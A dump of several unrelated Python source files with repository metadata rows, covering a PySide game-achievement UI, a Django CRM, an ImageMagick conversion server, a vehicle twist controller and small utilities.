sizePolicy.setHeightForWidth(self.install_path.sizePolicy().hasHeightForWidth())
self.install_path.setSizePolicy(sizePolicy)
self.install_path.setObjectName("install_path")
self.gridLayout.addWidget(self.install_path, 2, 0, 1, 1)
self.save_browse = QtGui.QPushButton(self.centralwidget)
self.save_browse.setObjectName("save_browse")
self.gridLayout.addWidget(self.save_browse, 4, 1, 1, 1)
self.install_browse = QtGui.QPushButton(self.centralwidget)
self.install_browse.setObjectName("install_browse")
self.gridLayout.addWidget(self.install_browse, 2, 1, 1, 1)
self.save_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.save_path.sizePolicy().hasHeightForWidth())
self.save_path.setSizePolicy(sizePolicy)
self.save_path.setObjectName("save_path")
self.gridLayout.addWidget(self.save_path, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 0, 1, 2)
self.label = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem)
self.save0 = QtGui.QPushButton(self.centralwidget)
self.save0.setEnabled(False)
self.save0.setMinimumSize(QtCore.QSize(0, 38))
self.save0.setMaximumSize(QtCore.QSize(416, 16777215))
self.save0.setObjectName("save0")
self.verticalLayout.addWidget(self.save0)
self.save1 = QtGui.QPushButton(self.centralwidget)
self.save1.setEnabled(False)
self.save1.setMinimumSize(QtCore.QSize(0, 38))
self.save1.setMaximumSize(QtCore.QSize(416, 16777215))
self.save1.setObjectName("save1")
self.verticalLayout.addWidget(self.save1)
self.save2 = QtGui.QPushButton(self.centralwidget)
self.save2.setEnabled(False)
self.save2.setMinimumSize(QtCore.QSize(0, 38))
self.save2.setMaximumSize(QtCore.QSize(416, 16777215))
self.save2.setObjectName("save2")
self.verticalLayout.addWidget(self.save2)
spacerItem1 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem1)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout.setObjectName("formLayout")
self.lbl_coast = QtGui.QLabel(self.centralwidget)
self.lbl_coast.setEnabled(False)
self.lbl_coast.setObjectName("lbl_coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_coast)
self.show_coast = QtGui.QPushButton(self.centralwidget)
self.show_coast.setEnabled(False)
self.show_coast.setObjectName("show_coast")
self.formLayout.setWidget(2, QtGui.QFormLayout.SpanningRole, self.show_coast)
spacerItem2 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(3, QtGui.QFormLayout.SpanningRole, spacerItem2)
self.lbl_urns = QtGui.QLabel(self.centralwidget)
self.lbl_urns.setEnabled(False)
self.lbl_urns.setObjectName("lbl_urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.LabelRole, self.lbl_urns)
self.urns = QtGui.QLabel(self.centralwidget)
self.urns.setText("")
self.urns.setObjectName("urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.FieldRole, self.urns)
self.show_urns = QtGui.QPushButton(self.centralwidget)
self.show_urns.setEnabled(False)
self.show_urns.setObjectName("show_urns")
self.formLayout.setWidget(5, QtGui.QFormLayout.SpanningRole, self.show_urns)
spacerItem3 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(6, QtGui.QFormLayout.SpanningRole, spacerItem3)
self.lbl_heads = QtGui.QLabel(self.centralwidget)
self.lbl_heads.setEnabled(False)
self.lbl_heads.setObjectName("lbl_heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.LabelRole, self.lbl_heads)
self.heads = QtGui.QLabel(self.centralwidget)
self.heads.setObjectName("heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.FieldRole, self.heads)
self.show_heads = QtGui.QPushButton(self.centralwidget)
self.show_heads.setEnabled(False)
self.show_heads.setObjectName("show_heads")
self.formLayout.setWidget(8, QtGui.QFormLayout.LabelRole, self.show_heads)
self.reset_head = QtGui.QPushButton(self.centralwidget)
self.reset_head.setEnabled(False)
self.reset_head.setObjectName("reset_head")
self.formLayout.setWidget(8, QtGui.QFormLayout.FieldRole, self.reset_head)
spacerItem4 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(9, QtGui.QFormLayout.SpanningRole, spacerItem4)
self.lbl_notes = QtGui.QLabel(self.centralwidget)
self.lbl_notes.setEnabled(False)
self.lbl_notes.setObjectName("lbl_notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.LabelRole, self.lbl_notes)
self.notes = QtGui.QLabel(self.centralwidget)
self.notes.setText("")
self.notes.setObjectName("notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.FieldRole, self.notes)
self.reset_notezz = QtGui.QPushButton(self.centralwidget)
self.reset_notezz.setEnabled(False)
self.reset_notezz.setObjectName("reset_notezz")
self.formLayout.setWidget(11, QtGui.QFormLayout.SpanningRole, self.reset_notezz)
spacerItem5 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(12, QtGui.QFormLayout.SpanningRole, spacerItem5)
self.lbl_plants = QtGui.QLabel(self.centralwidget)
self.lbl_plants.setEnabled(False)
self.lbl_plants.setObjectName("lbl_plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.LabelRole, self.lbl_plants)
self.plants = QtGui.QLabel(self.centralwidget)
self.plants.setText("")
self.plants.setObjectName("plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.FieldRole, self.plants)
self.coast = QtGui.QLabel(self.centralwidget)
self.coast.setText("")
self.coast.setObjectName("coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.coast)
self.verticalLayout.addLayout(self.formLayout)
spacerItem6 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem6)
self.save_map = QtGui.QPushButton(self.centralwidget)
self.save_map.setEnabled(False)
self.save_map.setObjectName("save_map")
self.verticalLayout.addWidget(self.save_map)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem7)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.scrollArea = QtGui.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(768, 0))
self.scrollArea.setBaseSize(QtCore.QSize(1024, 1024))
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1024, 1024))
self.scrollAreaWidgetContents.setMinimumSize(QtCore.QSize(1024, 1024))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
Miaschiev.setCentralWidget(self.centralwidget)
self.statusBar = QtGui.QStatusBar(Miaschiev)
self.statusBar.setObjectName("statusBar")
Miaschiev.setStatusBar(self.statusBar)
self.retranslateUi(Miaschiev)
QtCore.QMetaObject.connectSlotsByName(Miaschiev)
Miaschiev.setTabOrder(self.install_path, self.install_browse)
Miaschiev.setTabOrder(self.install_browse, self.save_path)
Miaschiev.setTabOrder(self.save_path, self.save_browse)
Miaschiev.setTabOrder(self.save_browse, self.save0)
Miaschiev.setTabOrder(self.save0, self.save1)
Miaschiev.setTabOrder(self.save1, self.save2)
Miaschiev.setTabOrder(self.save2, self.show_coast)
Miaschiev.setTabOrder(self.show_coast, self.show_urns)
Miaschiev.setTabOrder(self.show_urns, self.show_heads)
Miaschiev.setTabOrder(self.show_heads, self.reset_head)
Miaschiev.setTabOrder(self.reset_head, self.reset_notezz)
Miaschiev.setTabOrder(self.reset_notezz, self.scrollArea)
def retranslateUi(self, Miaschiev):
Miaschiev.setWindowTitle(QtGui.QApplication.translate("Miaschiev", "Mias(Achievement)mata", None, QtGui.QApplication.UnicodeUTF8))
self.save_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.install_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Saved Games Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Install Location:", None, QtGui.QApplication.UnicodeUTF8))
self.save0.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 1", None, QtGui.QApplication.UnicodeUTF8))
self.save1.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 2", None, QtGui.QApplication.UnicodeUTF8))
self.save2.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 3", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_coast.setText(QtGui.QApplication.translate("Miaschiev", "Coastline Mapped:", None, QtGui.QApplication.UnicodeUTF8))
self.show_coast.setText(QtGui.QApplication.translate("Miaschiev", "Show Mapped Coastline", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_urns.setText(QtGui.QApplication.translate("Miaschiev", "Urns Lit:", None, QtGui.QApplication.UnicodeUTF8))
self.show_urns.setText(QtGui.QApplication.translate("Miaschiev", "Show Lit Urns", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_heads.setText(QtGui.QApplication.translate("Miaschiev", "Head Statues Located:", None, QtGui.QApplication.UnicodeUTF8))
self.show_heads.setText(QtGui.QApplication.translate("Miaschiev", "Show", None, QtGui.QApplication.UnicodeUTF8))
self.reset_head.setText(QtGui.QApplication.translate("Miaschiev", "Reset one statue...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_notes.setText(QtGui.QApplication.translate("Miaschiev", "Notes Found:", None, QtGui.QApplication.UnicodeUTF8))
self.reset_notezz.setText(QtGui.QApplication.translate("Miaschiev", "Reset missing Sanchez #1 note...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_plants.setText(QtGui.QApplication.translate("Miaschiev", "Plants Found:", None, QtGui.QApplication.UnicodeUTF8))
self.save_map.setText(QtGui.QApplication.translate("Miaschiev", "Save current map to file...", None, QtGui.QApplication.UnicodeUTF8))
| 64.082949 | 151 | 0.718898 | 1,473 | 13,906 | 6.706721 | 0.120842 | 0.065391 | 0.051017 | 0.067315 | 0.516955 | 0.440024 | 0.223201 | 0.177245 | 0.160846 | 0.160846 | 0 | 0.023159 | 0.170933 | 13,906 | 216 | 152 | 64.37963 | 0.833724 | 0.01618 | 0 | 0.059113 | 1 | 0 | 0.061014 | 0.003344 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009852 | false | 0 | 0.004926 | 0 | 0.019704 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
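The generated class above follows the usual pyside-uic pattern; a hedged wiring sketch (module name assumed from the file path):

import sys
from PySide import QtGui
from miaschiev_ui import Ui_Miaschiev  # assumed module name

app = QtGui.QApplication(sys.argv)
window = QtGui.QMainWindow()
ui = Ui_Miaschiev()
ui.setupUi(window)  # builds the widgets and calls retranslateUi
window.show()
sys.exit(app.exec_())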
7756950ec6fb5c1205ec5e03552facad7a4cc3ac | 387 | py | Python | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from importlib import import_module
def get_annotations_compiler_flag() -> int:
future = import_module("__future__")
assert future is not None
annotations = getattr(future, "annotations")
assert annotations is not None
compiler_flag = getattr(annotations, "compiler_flag")
assert isinstance(compiler_flag, int)
return compiler_flag
| 27.642857 | 57 | 0.731266 | 46 | 387 | 5.869565 | 0.456522 | 0.222222 | 0.17037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003155 | 0.180879 | 387 | 13 | 58 | 29.769231 | 0.84858 | 0.054264 | 0 | 0 | 0 | 0 | 0.093407 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
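A usage sketch for the flag above: pass it to compile() so annotations are postponed rather than evaluated (import path assumed from the repo layout):

from recc.compile.future import get_annotations_compiler_flag  # assumed import path

flag = get_annotations_compiler_flag()
# With the `annotations` future, NotDefinedYet stays a string and is never resolved.
code = compile("def f(x: NotDefinedYet) -> None: pass", "<string>", "exec", flags=flag)
exec(code)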
775775cc7a45c42108314eb9aa9a67d61fab3d99 | 181 | py | Python | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | from ann import *
# Fetch 100 MNIST samples and assemble a small convolutional network.
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())      # convolutional layer
m.add(MaxPooling())  # spatial downsampling
m.add(Flatten())     # flatten feature maps into a vector
m.add(Dense(15))     # fully connected hidden layer
m.add(Dense(10, a_func='sigmoid'))  # 10-class output layer
| 20.111111 | 35 | 0.679558 | 35 | 181 | 3.428571 | 0.685714 | 0.166667 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054878 | 0.093923 | 181 | 8 | 36 | 22.625 | 0.676829 | 0 | 0 | 0 | 0 | 0 | 0.038674 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f | 2,559 | py | Python | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: file access should probably be limited,
# e.g. to the uploads dir only.
# There is also the slight problem of wanting to
# optimize theme files, for example (which should
# be done first, but it'd be convenient to reuse this).
# Maybe allow mounting a theme path.

# Collect args, stripping quotes, so the string
# works with subprocess.Popen.
# Assumes only single-quoted strings.
def append_args(cmd_list, cmd_args):
    in_string = False
    accum = ""
    # Walk every character: whitespace outside quotes separates arguments,
    # single quotes delimit arguments that may contain spaces.
    for char in cmd_args:
        if in_string:
            if char == "'":
                cmd_list.append(accum)
                accum = ""
                in_string = False
            else:
                accum = accum + char
        else:
            if char.isspace():
                if accum != "":
                    cmd_list.append(accum)
                    accum = ""
            elif accum == "" and char == "'":
                in_string = True
            else:
                accum = accum + char
    if accum != "":
        cmd_list.append(accum)
    return cmd_list
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
#subprocess.Popen(["ls", "-la", "/imgs"])
#subprocess.Popen(["id", "-u"])
#subprocess.Popen(["id", "-u", "-n"])
content_length = int(self.headers['Content-Length'])
cmd_args = self.rfile.read(content_length).decode('utf-8')
if len(cmd_args) > 0:
print(cmd_args)
cmd_list = append_args(["convert"], cmd_args)
print(cmd_list)
            # Capture stdout/stderr via pipes; without them communicate() returns (None, None).
            CmdOut = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            (stdout, stderr) = CmdOut.communicate()
            print(stdout)
            print(stderr)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("ok".encode('utf-8'))
#def log_message(self, format, *args):
# suppress logging per request
#return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325 | 66 | 0.5932 | 297 | 2,559 | 4.983165 | 0.505051 | 0.037838 | 0.035135 | 0.036486 | 0.058108 | 0.039189 | 0.039189 | 0 | 0 | 0 | 0 | 0.008864 | 0.294646 | 2,559 | 82 | 67 | 31.207317 | 0.81108 | 0.241891 | 0 | 0.303571 | 0 | 0 | 0.063509 | 0 | 0 | 0 | 0 | 0.012195 | 0 | 1 | 0.035714 | false | 0.035714 | 0.089286 | 0 | 0.178571 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
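A hypothetical client call against the server above (paths are made up; the port comes from the script):

import requests

# Single-quoted arguments survive the server's append_args parsing.
args = "'/imgs/input.png' -resize 50% '/imgs/output.png'"
resp = requests.post("http://localhost:1345", data=args)
print(resp.text)  # "ok"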
775ee35015e7fb1a1d56468e759eea466f2753f3 | 388 | py | Python | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | 1 | 2020-10-17T04:41:47.000Z | 2020-10-17T04:41:47.000Z | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | from tastypie.authentication import SessionAuthentication
class UberAuthentication(SessionAuthentication):
"""
Handles authentication for the course resources.
"""
def is_authenticated(self, request, **kwargs):
if request.method == 'GET':
return True
else:
return super(UberAuthentication, self).is_authenticated(request, **kwargs) | 35.272727 | 86 | 0.693299 | 35 | 388 | 7.628571 | 0.714286 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219072 | 388 | 11 | 86 | 35.272727 | 0.881188 | 0.123711 | 0 | 0 | 0 | 0 | 0.009231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
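Typical tastypie wiring for the class above (resource name and import path are illustrative):

from tastypie.resources import ModelResource
from main.api.authentication import UberAuthentication  # assumed import path

class CourseResource(ModelResource):  # illustrative resource
    class Meta:
        authentication = UberAuthentication()  # GETs pass freely; other methods need a session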
91f2badbe46ccc2afa070e8ea0d95aa258e9f159 | 3,199 | py | Python | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
class ActiveParentManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class ParentAccount(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
category = models.CharField(_("Category"), max_length=10, choices=utils.ACC_CATEGORY, help_text='Required',)
slug = models.SlugField(unique=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="parent_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
def __str__(self):
return self.name
class Meta:
ordering = ["name"]
verbose_name = 'Parent Account'
verbose_name_plural = 'Parent Accounts'
objects = models.Manager() # The default manager.
active = ActiveParentManager() # Custom manager.
class ActiveAccountsManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Account(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
country = models.CharField(_("Country"), max_length=30, choices=utils.COUNTRIES, help_text='Required')
industry = models.CharField(_("Industry"), max_length=255, choices=utils.ACC_INDUSTRY, help_text='Required')
parent_account = models.ForeignKey(ParentAccount, related_name="account_parent_account", on_delete=models.PROTECT, help_text='Required')
slug = models.SlugField(unique=True)
status = models.CharField(_("Status"), max_length=15, choices=utils.ACC_STATUS, default="Prospect", help_text='Required')
address = models.CharField(_("Address"), max_length=255, blank=True, null=True)
website = models.URLField(_("Website"), blank=True, null=True)
description = models.TextField(blank=True, null=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="account_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
contacts = models.ManyToManyField(Contact, related_name="account_contacts", blank=True)
assigned_to = models.ForeignKey(User, related_name="account_assigned_user", on_delete=models.PROTECT)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("accounts:detail", args=[self.slug])
class Meta:
ordering = ["status"]
verbose_name = 'Account'
objects = models.Manager() # The default manager.
active = ActiveAccountsManager() # Custom manager.
| 42.092105 | 140 | 0.736168 | 391 | 3,199 | 5.808184 | 0.250639 | 0.046235 | 0.049317 | 0.036988 | 0.481286 | 0.453104 | 0.412153 | 0.374284 | 0.336416 | 0.336416 | 0 | 0.005837 | 0.14317 | 3,199 | 75 | 141 | 42.653333 | 0.822692 | 0.02282 | 0 | 0.4 | 0 | 0 | 0.110897 | 0.013782 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.145455 | 0.090909 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
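A query sketch exercising the custom managers above (assumes migrations have been applied; import path from the file layout):

from accounts.models import Account, ParentAccount  # assumed import path

active_parents = ParentAccount.active.all()           # only is_active=True rows
prospects = Account.active.filter(status='Prospect')  # default status from the model
first = prospects.first()
if first:
    print(first.get_absolute_url())  # the accounts:detail URL for its slug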
91f411263bdba1a973d2748f05c7f918cdbad645 | 1,176 | py | Python | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | 2 | 2019-02-05T02:55:57.000Z | 2019-02-10T20:12:41.000Z | from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
    def __init__(self, wheel_base, steer_ratio, max_lat_accel, max_steer_angle, accel_limit, decel_limit):
        self.yaw = YawController(wheel_base, steer_ratio, 0., max_lat_accel, max_steer_angle)
        self.steer = 0.0
        self.throttle = 0.0
        self.brake = 0.0
        # PID gains for longitudinal (velocity) control.
        self.kp = 0.9
        self.ki = 0.01
        self.kd = 0.4
        self.mn = decel_limit  # lower output bound: strongest allowed deceleration
        self.mx = 0.5          # upper output bound: throttle cap
        self.pid = PID(self.kp, self.ki, self.kd, self.mn, self.mx)
        self.accel = None

    def control(self, lin_vel, ang_vel, curr_vel, sample_time, vehicle_mass, wheel_radius, dbw):
        self.steer = self.yaw.get_steering(lin_vel, ang_vel, curr_vel)
        error = lin_vel - curr_vel
        if lin_vel == 0 and curr_vel == 0:
            self.throttle = 0
            self.brake = 700  # hold-brake torque (N*m) to prevent rolling forward at a stop
        if dbw:
            accel_target = self.pid.step(error, sample_time)
            if accel_target >= 0:
                self.throttle = accel_target
                self.brake = 0.0
            else:
                # Negative target acceleration: translate into a brake torque (N*m).
                self.throttle = 0.0
                self.brake = -accel_target * vehicle_mass * wheel_radius
        return self.throttle, self.brake, self.steer
| 25.021277 | 104 | 0.681973 | 191 | 1,176 | 3.973822 | 0.340314 | 0.046113 | 0.031621 | 0.050066 | 0.173913 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0.040043 | 0.214286 | 1,176 | 46 | 105 | 25.565217 | 0.781385 | 0.019558 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
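An illustrative call into the controller above (all numeric values are made up for the sketch; import path assumed):

from twist_controller import Controller  # assumed import path

ctrl = Controller(wheel_base=2.8489, steer_ratio=14.8, max_lat_accel=3.0,
                  max_steer_angle=8.0, accel_limit=1.0, decel_limit=-5.0)
throttle, brake, steer = ctrl.control(lin_vel=10.0, ang_vel=0.1, curr_vel=8.5,
                                      sample_time=0.02, vehicle_mass=1736.35,
                                      wheel_radius=0.2413, dbw=True)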
91fc55bd294641a3405ae46e672d73216e1f79e0 | 450 | py | Python | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 10 | 2017-04-25T20:20:14.000Z | 2021-02-26T18:57:59.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 19 | 2018-08-09T20:45:51.000Z | 2021-11-29T17:47:21.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 8 | 2018-06-28T02:54:06.000Z | 2020-02-23T13:34:46.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
